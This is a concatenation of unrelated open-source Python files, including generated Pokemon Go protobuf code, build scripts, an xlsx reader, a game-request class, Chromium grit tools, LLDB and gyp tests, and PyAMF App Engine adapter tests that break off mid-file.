SET_PLAYER_TEAM = 405
MARK_TUTORIAL_COMPLETE = 406
LOAD_SPAWN_POINTS = 500
ECHO = 666
DEBUG_UPDATE_INVENTORY = 700
DEBUG_DELETE_PLAYER = 701
SFIDA_REGISTRATION = 800
SFIDA_ACTION_LOG = 801
SFIDA_CERTIFICATION = 802
SFIDA_UPDATE = 803
SFIDA_ACTION = 804
SFIDA_DOWSER = 805
SFIDA_CAPTURE = 806
_REQUEST = _descriptor.Descriptor(
name='Request',
full_name='POGOProtos.Networking.Requests.Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='request_type', full_name='POGOProtos.Networking.Requests.Request.request_type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='request_message', full_name='POGOProtos.Networking.Requests.Request.request_message', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=72,
serialized_end=173,
)
_REQUEST.fields_by_name['request_type'].enum_type = _REQUESTTYPE
DESCRIPTOR.message_types_by_name['Request'] = _REQUEST
DESCRIPTOR.enum_types_by_name['RequestType'] = _REQUESTTYPE
Request = _reflection.GeneratedProtocolMessageType('Request', (_message.Message,), dict(
DESCRIPTOR = _REQUEST,
__module__ = 'POGOProtos.Networking.Requests_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Request)
))
_sym_db.RegisterMessage(Request)
# @@protoc_insertion_point(module_scope)
|
pczerkas/devstack
|
refs/heads/master
|
setup.py
|
463
|
#!/usr/bin/env python
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# THIS FILE IS MANAGED BY THE GLOBAL REQUIREMENTS REPO - DO NOT EDIT
import setuptools
setuptools.setup(
setup_requires=['pbr'],
pbr=True)
|
refola/piklisp.py
|
refs/heads/master
|
piklisp.py
|
2
|
#!/usr/bin/python3
'''
piklisp.py
Author: Mark Haferkamp
Last date modified: 2015-04-08
Interpret a Pythony dialect of Lisp.
Piklisp is a scripting language that uses a parentheses-light Lisp syntax and macro system to run Python functions.
It's essentially Pythonic syntax and features combined with Lisp semantics and listiness. As Clojure is to Java, Piklisp tries to be to Python.
'''
import sys
import tokens
import parser
import compiler
def getLines(filename):
'''Get the lines of text in a file, without line breaks.'''
f = open(filename, 'rt')
lines = list(l in f)
return lines
def process(filename):
'''Process a single file. Takse the name of a .pyl file and saves the result to a .py file.'''
lineList = getLines(filename)
tokenList = tokens.convert(lineList)
parseTree = parser.parseTokens(tokenList)
compiled = compiler.compileTree(parseTree)
writeFile(compiled)
def usage():
'''Show how to use the program.'''
print("Usage: %s pyl-file-1 [pyl-file-2 [...]]" % sys.argv[0])
print()
print("Converts given .pyl Piklisp files into .py Python files.")
print("You probably want to run this as '%s *.pyl'." % sys.argv[0])
def main():
'''Figure out what to do.'''
args=sys.argv[1:]
if len(args) == 0:
usage()
return
for arg in args:
if arg[-4:] != '.pyl':
print("Invalid Piklisp file: %s." % arg)
usage()
return
for arg in args:
process(arg)
main()
|
erickt/hue
|
refs/heads/master
|
desktop/core/ext-py/tablib-develop/tablib/packages/openpyxl/reader/excel.py
|
61
|
# file openpyxl/reader/excel.py
# Copyright (c) 2010 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: Eric Gazoni
"""Read an xlsx file into Python"""
# Python stdlib imports
from zipfile import ZipFile, ZIP_DEFLATED, BadZipfile
# package imports
from ..shared.exc import OpenModeError, InvalidFileException
from ..shared.ooxml import ARC_SHARED_STRINGS, ARC_CORE, ARC_APP, \
ARC_WORKBOOK, PACKAGE_WORKSHEETS, ARC_STYLE
from ..workbook import Workbook
from ..reader.strings import read_string_table
from ..reader.style import read_style_table
from ..reader.workbook import read_sheets_titles, read_named_ranges, \
read_properties_core, get_sheet_ids
from ..reader.worksheet import read_worksheet
from ..reader.iter_worksheet import unpack_worksheet
def load_workbook(filename, use_iterators = False):
"""Open the given filename and return the workbook
:param filename: the path to open
:type filename: string
:param use_iterators: use lazy load for cells
:type use_iterators: bool
:rtype: :class:`openpyxl.workbook.Workbook`
.. note::
When using lazy load, all worksheets will be :class:`openpyxl.reader.iter_worksheet.IterableWorksheet`
and the returned workbook will be read-only.
"""
if isinstance(filename, file):
# fileobject must have been opened with 'rb' flag
# it is required by zipfile
if 'b' not in filename.mode:
raise OpenModeError("File-object must be opened in binary mode")
try:
archive = ZipFile(filename, 'r', ZIP_DEFLATED)
except (BadZipfile, RuntimeError, IOError, ValueError):
raise InvalidFileException()
wb = Workbook()
if use_iterators:
wb._set_optimized_read()
try:
_load_workbook(wb, archive, filename, use_iterators)
except KeyError:
raise InvalidFileException()
finally:
archive.close()
return wb
def _load_workbook(wb, archive, filename, use_iterators):
# get workbook-level information
wb.properties = read_properties_core(archive.read(ARC_CORE))
try:
string_table = read_string_table(archive.read(ARC_SHARED_STRINGS))
except KeyError:
string_table = {}
style_table = read_style_table(archive.read(ARC_STYLE))
# get worksheets
wb.worksheets = [] # remove preset worksheet
sheet_names = read_sheets_titles(archive.read(ARC_APP))
for i, sheet_name in enumerate(sheet_names):
sheet_codename = 'sheet%d.xml' % (i + 1)
worksheet_path = '%s/%s' % (PACKAGE_WORKSHEETS, sheet_codename)
if not use_iterators:
new_ws = read_worksheet(archive.read(worksheet_path), wb, sheet_name, string_table, style_table)
else:
xml_source = unpack_worksheet(archive, worksheet_path)
new_ws = read_worksheet(xml_source, wb, sheet_name, string_table, style_table, filename, sheet_codename)
#new_ws = read_worksheet(archive.read(worksheet_path), wb, sheet_name, string_table, style_table, filename, sheet_codename)
wb.add_sheet(new_ws, index = i)
wb._named_ranges = read_named_ranges(archive.read(ARC_WORKBOOK), wb)
|
KevZho/buffbot
|
refs/heads/master
|
kol/request/CocktailcraftingRequest.py
|
4
|
import kol.Error as Error
from kol.database import ItemDatabase
from kol.manager import PatternManager
from kol.request.GenericRequest import GenericRequest
class CocktailcraftingRequest(GenericRequest):
def __init__(self, session, itemid1, itemid2, numDrinks=1, makeMax=False):
super(CocktailcraftingRequest, self).__init__(session)
self.url = session.serverURL + "craft.php"
self.requestData['mode'] = 'cocktail'
self.requestData['pwd'] = session.pwd
self.requestData['action'] = 'craft'
self.requestData['qty'] = numDrinks
self.requestData['a'] = itemid1
self.requestData['b'] = itemid2
if makeMax:
self.requestData['max'] = "on"
def parseResponse(self):
itemsDontMakeCocktailPattern = PatternManager.getOrCompilePattern('itemsDontMakeCocktail')
dontHaveSkillPattern = PatternManager.getOrCompilePattern('dontHaveSkillToMixCocktail')
dontHaveItemsPattern = PatternManager.getOrCompilePattern('dontHaveItemsForThatCocktail')
dontHaveAdventuresPattern = PatternManager.getOrCompilePattern('dontHaveAdventuresToMixCocktail')
# Check for errors.
if itemsDontMakeCocktailPattern.search(self.responseText):
raise Error.Error("Unable to make cocktail. The submitted ingredients do not mix together.", Error.RECIPE_NOT_FOUND)
elif dontHaveSkillPattern.search(self.responseText):
raise Error.Error("Unable to make cocktail. We are not skilled enough.", Error.SKILL_NOT_FOUND)
elif dontHaveItemsPattern.search(self.responseText):
raise Error.Error("Unable to make cocktail. You don't have all of the items you are trying to mix.", Error.ITEM_NOT_FOUND)
elif dontHaveAdventuresPattern.search(self.responseText):
raise Error.Error("Unable to mix drink(s). We don't have enough adventures.", Error.NOT_ENOUGH_ADVENTURES)
# Find the items attached to the message.
singleItemPattern = PatternManager.getOrCompilePattern('acquireSingleItem')
match = singleItemPattern.search(self.responseText)
if match:
descId = int(match.group(1))
item = ItemDatabase.getOrDiscoverItemFromDescId(descId, self.session)
item["quantity"] = 1
else:
multiItemPattern = PatternManager.getOrCompilePattern('acquireMultipleItems')
match = multiItemPattern.search(self.responseText)
if match:
descId = int(match.group(1))
item = ItemDatabase.getOrDiscoverItemFromDescId(descId, self.session)
quantity = int(match.group(2).replace(',', ''))
item["quantity"] = quantity
else:
raise Error.Error("Unknown error.", Error.REQUEST_GENERIC)
self.responseData["booze"] = item
|
lucafavatella/intellij-community
|
refs/heads/cli-wip
|
python/testData/refactoring/introduceVariable/suggestStringConstantValue.py
|
166
|
"foo <caret>bar"
|
heke123/chromium-crosswalk
|
refs/heads/master
|
tools/grit/grit_info.py
|
31
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Tool to determine inputs and outputs of a grit file.
'''
import optparse
import os
import posixpath
import sys
from grit import grd_reader
from grit import util
class WrongNumberOfArguments(Exception):
pass
def Outputs(filename, defines, ids_file, target_platform=None):
grd = grd_reader.Parse(
filename, defines=defines, tags_to_ignore=set(['messages']),
first_ids_file=ids_file, target_platform=target_platform)
target = []
lang_folders = {}
# Add all explicitly-specified output files
for output in grd.GetOutputFiles():
path = output.GetFilename()
target.append(path)
if path.endswith('.h'):
path, filename = os.path.split(path)
if output.attrs['lang']:
lang_folders[output.attrs['lang']] = os.path.dirname(path)
# Add all generated files, once for each output language.
for node in grd:
if node.name == 'structure':
with node:
# TODO(joi) Should remove the "if sconsdep is true" thing as it is a
# hack - see grit/node/structure.py
if node.HasFileForLanguage() and node.attrs['sconsdep'] == 'true':
for lang in lang_folders:
path = node.FileForLanguage(lang, lang_folders[lang],
create_file=False,
return_if_not_generated=False)
if path:
target.append(path)
return [t.replace('\\', '/') for t in target]
def GritSourceFiles():
files = []
grit_root_dir = os.path.relpath(os.path.dirname(__file__), os.getcwd())
for root, dirs, filenames in os.walk(grit_root_dir):
grit_src = [os.path.join(root, f) for f in filenames
if f.endswith('.py') and not f.endswith('_unittest.py')]
files.extend(grit_src)
return sorted(files)
def Inputs(filename, defines, ids_file, target_platform=None):
grd = grd_reader.Parse(
filename, debug=False, defines=defines, tags_to_ignore=set(['message']),
first_ids_file=ids_file, target_platform=target_platform)
files = set()
for lang, ctx, fallback in grd.GetConfigurations():
# TODO(tdanderson): Refactor all places which perform the action of setting
# output attributes on the root. See crbug.com/503637.
grd.SetOutputLanguage(lang or grd.GetSourceLanguage())
grd.SetOutputContext(ctx)
grd.SetFallbackToDefaultLayout(fallback)
for node in grd.ActiveDescendants():
with node:
if (node.name == 'structure' or node.name == 'skeleton' or
(node.name == 'file' and node.parent and
node.parent.name == 'translations')):
path = node.GetInputPath()
if path is not None:
files.add(grd.ToRealPath(path))
# If it's a flattened node, grab inlined resources too.
if node.name == 'structure' and node.attrs['flattenhtml'] == 'true':
node.RunPreSubstitutionGatherer()
files.update(node.GetHtmlResourceFilenames())
elif node.name == 'grit':
first_ids_file = node.GetFirstIdsFile()
if first_ids_file:
files.add(first_ids_file)
elif node.name == 'include':
files.add(grd.ToRealPath(node.GetInputPath()))
# If it's a flattened node, grab inlined resources too.
if node.attrs['flattenhtml'] == 'true':
files.update(node.GetHtmlResourceFilenames())
elif node.name == 'part':
files.add(util.normpath(os.path.join(os.path.dirname(filename),
node.GetInputPath())))
cwd = os.getcwd()
return [os.path.relpath(f, cwd) for f in sorted(files)]
def PrintUsage():
print 'USAGE: ./grit_info.py --inputs [-D foo] [-f resource_ids] <grd-file>'
print (' ./grit_info.py --outputs [-D foo] [-f resource_ids] ' +
'<out-prefix> <grd-file>')
def DoMain(argv):
parser = optparse.OptionParser()
parser.add_option("--inputs", action="store_true", dest="inputs")
parser.add_option("--outputs", action="store_true", dest="outputs")
parser.add_option("-D", action="append", dest="defines", default=[])
# grit build also supports '-E KEY=VALUE', support that to share command
# line flags.
parser.add_option("-E", action="append", dest="build_env", default=[])
parser.add_option("-w", action="append", dest="whitelist_files", default=[])
parser.add_option("--output-all-resource-defines", action="store_true",
dest="output_all_resource_defines", default=True,
help="Unused")
parser.add_option("--no-output-all-resource-defines", action="store_false",
dest="output_all_resource_defines", default=True,
help="Unused")
parser.add_option("-f", dest="ids_file",
default="GRIT_DIR/../gritsettings/resource_ids")
parser.add_option("-t", dest="target_platform", default=None)
options, args = parser.parse_args(argv)
defines = {}
for define in options.defines:
name, val = util.ParseDefine(define)
defines[name] = val
for env_pair in options.build_env:
(env_name, env_value) = env_pair.split('=', 1)
os.environ[env_name] = env_value
if options.inputs:
if len(args) > 1:
raise WrongNumberOfArguments("Expected 0 or 1 arguments for --inputs.")
inputs = []
if len(args) == 1:
filename = args[0]
inputs = Inputs(filename, defines, options.ids_file,
options.target_platform)
# Add in the grit source files. If one of these change, we want to re-run
# grit.
inputs.extend(GritSourceFiles())
inputs = [f.replace('\\', '/') for f in inputs]
if len(args) == 1:
# Include grd file as second input (works around gyp expecting it).
inputs.insert(1, args[0])
if options.whitelist_files:
inputs.extend(options.whitelist_files)
return '\n'.join(inputs)
elif options.outputs:
if len(args) != 2:
raise WrongNumberOfArguments(
"Expected exactly 2 arguments for --outputs.")
prefix, filename = args
outputs = [posixpath.join(prefix, f)
for f in Outputs(filename, defines,
options.ids_file, options.target_platform)]
return '\n'.join(outputs)
else:
raise WrongNumberOfArguments("Expected --inputs or --outputs.")
def main(argv):
if sys.version_info < (2, 6):
print "GRIT requires Python 2.6 or later."
return 1
try:
result = DoMain(argv[1:])
except WrongNumberOfArguments, e:
PrintUsage()
print e
return 1
print result
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
endlessm/chromium-browser
|
refs/heads/master
|
third_party/llvm/lldb/test/API/functionalities/recursion/TestValueObjectRecursion.py
|
6
|
"""
Test lldb data formatter subsystem.
"""
from __future__ import print_function
import lldb
from lldbsuite.test.lldbtest import *
import lldbsuite.test.lldbutil as lldbutil
class ValueObjectRecursionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break at.
self.line = line_number('main.cpp', '// Set break point at this line.')
def test_with_run_command(self):
"""Test that deeply nested ValueObjects still work."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self, "main.cpp", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# This is the function to remove the custom formats in order to have a
# clean slate for the next test case.
def cleanup():
self.runCmd('type format clear', check=False)
self.runCmd('type summary clear', check=False)
# Execute the cleanup function during test case tear down.
self.addTearDownHook(cleanup)
root = self.frame().FindVariable("root")
child = root.GetChildAtIndex(1)
if self.TraceOn():
print(root)
print(child)
for i in range(0, 15000):
child = child.GetChildAtIndex(1)
if self.TraceOn():
print(child)
self.assertTrue(
child.IsValid(),
"could not retrieve the deep ValueObject")
self.assertTrue(
child.GetChildAtIndex(0).IsValid(),
"the deep ValueObject has no value")
self.assertTrue(
child.GetChildAtIndex(0).GetValueAsUnsigned() != 0,
"the deep ValueObject has a zero value")
self.assertTrue(
child.GetChildAtIndex(1).GetValueAsUnsigned() != 0,
"the deep ValueObject has no next")
|
junhuac/MQUIC
|
refs/heads/master
|
src/tools/grit/grit/node/include_unittest.py
|
52
|
#!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for include.IncludeNode'''
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import os
import StringIO
import unittest
from grit.node import misc
from grit.node import include
from grit.node import empty
from grit import grd_reader
from grit import util
class IncludeNodeUnittest(unittest.TestCase):
def testGetPath(self):
root = misc.GritNode()
root.StartParsing(u'grit', None)
root.HandleAttribute(u'latest_public_release', u'0')
root.HandleAttribute(u'current_release', u'1')
root.HandleAttribute(u'base_dir', ur'..\resource')
release = misc.ReleaseNode()
release.StartParsing(u'release', root)
release.HandleAttribute(u'seq', u'1')
root.AddChild(release)
includes = empty.IncludesNode()
includes.StartParsing(u'includes', release)
release.AddChild(includes)
include_node = include.IncludeNode()
include_node.StartParsing(u'include', includes)
include_node.HandleAttribute(u'file', ur'flugel\kugel.pdf')
includes.AddChild(include_node)
root.EndParsing()
self.assertEqual(root.ToRealPath(include_node.GetInputPath()),
util.normpath(
os.path.join(ur'../resource', ur'flugel/kugel.pdf')))
def testGetPathNoBasedir(self):
root = misc.GritNode()
root.StartParsing(u'grit', None)
root.HandleAttribute(u'latest_public_release', u'0')
root.HandleAttribute(u'current_release', u'1')
root.HandleAttribute(u'base_dir', ur'..\resource')
release = misc.ReleaseNode()
release.StartParsing(u'release', root)
release.HandleAttribute(u'seq', u'1')
root.AddChild(release)
includes = empty.IncludesNode()
includes.StartParsing(u'includes', release)
release.AddChild(includes)
include_node = include.IncludeNode()
include_node.StartParsing(u'include', includes)
include_node.HandleAttribute(u'file', ur'flugel\kugel.pdf')
include_node.HandleAttribute(u'use_base_dir', u'false')
includes.AddChild(include_node)
root.EndParsing()
self.assertEqual(root.ToRealPath(include_node.GetInputPath()),
util.normpath(
os.path.join(ur'../', ur'flugel/kugel.pdf')))
if __name__ == '__main__':
unittest.main()
|
d3m3vilurr/node-gyp
|
refs/heads/master
|
legacy/tools/gyp/pylib/gyp/generator/ninja_test.py
|
39
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Unit tests for the ninja.py file. """
import gyp.generator.ninja as ninja
import unittest
import StringIO
import TestCommon
class TestPrefixesAndSuffixes(unittest.TestCase):
def test_BinaryNamesWindows(self):
writer = ninja.NinjaWriter('wee', '.', '.', 'ninja.build', 'win')
spec = { 'target_name': 'wee' }
self.assertTrue(writer.ComputeOutputFileName(spec, 'executable').
endswith('.exe'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
endswith('.dll'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
endswith('.lib'))
def test_BinaryNamesLinux(self):
writer = ninja.NinjaWriter('wee', '.', '.', 'ninja.build', 'linux')
spec = {
'target_name': 'wee'
}
self.assertTrue('.' not in writer.ComputeOutputFileName(spec, 'executable'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
startswith('lib'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
startswith('lib'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
endswith('.so'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
endswith('.a'))
if __name__ == '__main__':
unittest.main()
|
GdZ/scriptfile
|
refs/heads/master
|
software/googleAppEngine/lib/PyAMF/pyamf/tests/adapters/test_google.py
|
26
|
# Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
PyAMF Google adapter tests.
@since: 0.3.1
"""
import unittest
import datetime
import struct
import os
import pyamf
from pyamf import amf3
from pyamf.tests import util
try:
from google.appengine.ext import db
except ImportError:
db = None
blobstore = None
polymodel = None
adapter_db = None
adapter_blobstore = None
test_models = None
Spam = util.Spam
def setUpModule():
"""
"""
global db, blobstore, polymodel, adapter_blobstore, adapter_db, test_models
if db is None:
raise unittest.SkipTest("'google.appengine.ext.db' is not available")
if not os.environ.get('SERVER_SOFTWARE', None):
# this is an extra check because the AppEngine SDK may be in PYTHONPATH
raise unittest.SkipTest('Appengine env not bootstrapped correctly')
# all looks good - we now initialise the imports we require
from google.appengine.ext import blobstore
from google.appengine.ext.db import polymodel
from pyamf.adapters import _google_appengine_ext_db as adapter_db
from pyamf.adapters import _google_appengine_ext_blobstore as adapter_blobstore
from pyamf.tests.adapters import _google_models as test_models
class BaseTestCase(util.ClassCacheClearingTestCase):
"""
"""
def put(self, entity):
entity.put()
self.addCleanup(self.deleteEntity, entity)
def deleteEntity(self, entity):
if entity.is_saved():
entity.delete()
def decode(self, bytes, encoding=pyamf.AMF3):
decoded = list(pyamf.decode(bytes, encoding=encoding))
if len(decoded) == 1:
return decoded[0]
return decoded
def encodeKey(self, key, encoding):
"""
Returns an AMF encoded representation of a L{db.Key} instance.
@param key: The L{db.Key} to be encoded.
@type key: L{db.Key}
@param encoding: The AMF version.
"""
if hasattr(key, 'key'):
# we have a db.Model instance
try:
key = key.key()
except db.NotSavedError:
key = None
if not key:
# the AMF representation of None
if encoding == pyamf.AMF3:
return '\x01'
return '\x05'
k = str(key)
if encoding == pyamf.AMF3:
return '\x06%s%s' % (
amf3.encode_int(len(k) << 1 | amf3.REFERENCE_BIT), k)
return '\x02%s%s' % (struct.pack('>H', len(k)), k)
class JessicaFactory(object):
"""
Provides jessica!
"""
jessica_attrs = {
'name': 'Jessica',
'type': 'cat',
'birthdate': datetime.date(1986, 10, 2),
'weight_in_pounds': 5,
'spayed_or_neutered': False
}
@classmethod
def makeJessica(kls, cls, **kwargs):
j_kwargs = kls.jessica_attrs.copy()
j_kwargs.update(kwargs)
return cls(**j_kwargs)
class EncodingModelTestCase(BaseTestCase):
"""
"""
def setUp(self):
BaseTestCase.setUp(self)
self.jessica = JessicaFactory.makeJessica(test_models.PetModel)
def test_amf0(self):
encoded = (
'\x03', (
'\x00\x04_key%s' % (self.encodeKey(self.jessica, pyamf.AMF0)),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00'
),
'\x00\x00\t'
)
self.assertEncodes(self.jessica, encoded, encoding=pyamf.AMF0)
def test_amf3(self):
bytes = (
'\n\x0b\x01', (
'\tname\x06\x0fJessica',
'\t_key%s' % (self.encodeKey(self.jessica, pyamf.AMF3)),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
def test_save_amf0(self):
self.put(self.jessica)
bytes = ('\x03', (
'\x00\x04_key%s' % self.encodeKey(self.jessica, pyamf.AMF0),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00'),
'\x00\x00\t')
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF0)
def test_save_amf3(self):
self.put(self.jessica)
bytes = (
'\n\x0b\x01', (
'\tname\x06\x0fJessica',
'\t_key%s' % self.encodeKey(self.jessica, pyamf.AMF3),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
def test_alias_amf0(self):
pyamf.register_class(test_models.PetModel, 'Pet')
bytes = (
'\x10\x00\x03Pet', (
'\x00\x04_key%s' % self.encodeKey(self.jessica, pyamf.AMF0),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00'
),
'\x00\x00\t'
)
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF0)
def test_alias_amf3(self):
pyamf.register_class(test_models.PetModel, 'Pet')
bytes = (
'\n\x0b\x07Pet', (
'\tname\x06\x0fJessica',
'\t_key%s' % self.encodeKey(self.jessica, pyamf.AMF3),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\x07foo\x06\x07bar',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
class EncodingExpandoTestCase(BaseTestCase):
"""
Tests for encoding L{db.Expando} classes
"""
def setUp(self):
BaseTestCase.setUp(self)
self.jessica = JessicaFactory.makeJessica(test_models.PetExpando, foo='bar')
self.addCleanup(self.deleteEntity, self.jessica)
def test_amf0(self):
bytes = (
'\x03', (
'\x00\x04_key%s' % self.encodeKey(self.jessica, pyamf.AMF0),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00',
'\x00\x03foo\x02\x00\x03bar'
),
'\x00\x00\t'
)
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF0)
def test_amf3(self):
bytes = (
'\n\x0b\x01', (
'\tname\x06\x0fJessica',
'\t_key%s' % self.encodeKey(self.jessica, pyamf.AMF3),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\x07foo\x06\x07bar',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
def test_save_amf0(self):
self.put(self.jessica)
bytes = pyamf.encode(self.jessica, encoding=pyamf.AMF0).getvalue()
self.assertBuffer(bytes, ('\x03', (
'\x00\x04_key%s' % self.encodeKey(self.jessica, pyamf.AMF0),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00',
'\x00\x03foo\x02\x00\x03bar'),
'\x00\x00\t'))
def test_save_amf3(self):
self.put(self.jessica)
bytes = (
'\n\x0b\x01', (
'\tname\x06\x0fJessica',
'\t_key%s' % self.encodeKey(self.jessica, pyamf.AMF3),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\x07foo\x06\x07bar',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
def test_alias_amf0(self):
pyamf.register_class(test_models.PetExpando, 'Pet')
bytes = pyamf.encode(self.jessica, encoding=pyamf.AMF0).getvalue()
self.assertBuffer(bytes, ('\x10\x00\x03Pet', (
'\x00\x04_key%s' % self.encodeKey(self.jessica, pyamf.AMF0),
'\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x07Jessica',
'\x00\x12spayed_or_neutered\x01\x00',
'\x00\x04type\x02\x00\x03cat',
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00',
'\x00\x03foo\x02\x00\x03bar'),
'\x00\x00\t'))
def test_alias_amf3(self):
pyamf.register_class(test_models.PetExpando, 'Pet')
bytes = (
'\n\x0b\x07Pet', (
'\tname\x06\x0fJessica',
'\t_key%s' % self.encodeKey(self.jessica, pyamf.AMF3),
'\x13birthdate\x08\x01B^\xc4\xae\xaa\x00\x00\x00',
'!weight_in_pounds\x04\x05',
'\x07foo\x06\x07bar',
'\ttype\x06\x07cat',
'%spayed_or_neutered\x02\x01'
))
self.assertEncodes(self.jessica, bytes, encoding=pyamf.AMF3)
class EncodingReferencesTestCase(BaseTestCase):
"""
This test case refers to L{db.ReferenceProperty<http://code.google.com/app
engine/docs/datastore/typesandpropertyclasses.html#ReferenceProperty>},
not AMF references.
"""
def test_model(self):
a = test_models.Author(name='Jane Austen')
self.put(a)
k = str(a.key())
amf0_k = self.encodeKey(a, pyamf.AMF0)
amf3_k = self.encodeKey(a, pyamf.AMF3)
b = test_models.Novel(title='Sense and Sensibility', author=a)
self.assertIdentical(b.author, a)
bytes = (
'\x03', (
